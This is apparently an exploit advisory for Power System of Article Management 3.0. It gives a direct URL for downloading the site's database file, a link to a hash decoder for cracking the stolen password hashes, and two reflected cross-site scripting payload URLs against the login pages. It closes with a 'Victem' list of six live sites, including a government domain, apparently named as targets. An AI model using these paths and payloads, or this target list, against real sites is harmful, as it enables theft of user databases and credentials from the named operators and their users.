Power System of Article Management version 3.0 suffers from database disclosure and cross site scripting vulnerabilities.
b9d0605fee5a8cc6c0f24014ea62c5527c65e94feab93643d63121ece1d8c0d9
#########################################################
---------------------------------------------------------
Portal Name: Power System Of Article Management
Version : 3.0
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/yiuwekdsodksldfslwifds.mdb
Hash Decoder :
http://pouya2006.persiangig.com/dec/PSOAMv3.html
or Google searching ...
[XSS]:
http://site.com/[Path]/userchklogin.asp?UserName=Pouya&Password=Pouya&CookieDate=0&ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&Submit=%C8%B7%C8%CF
http://site.com/[Path]/userlogin.asp?ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://www.honeyjenny.com/art
http://www.hzyzzz.com
http://cdzy.cn/wyx/article
http://unix-cd.com/article
http://zhuyaren.com
http://www.ahss.gov.cn
---------------------------------------------------------
#########################################################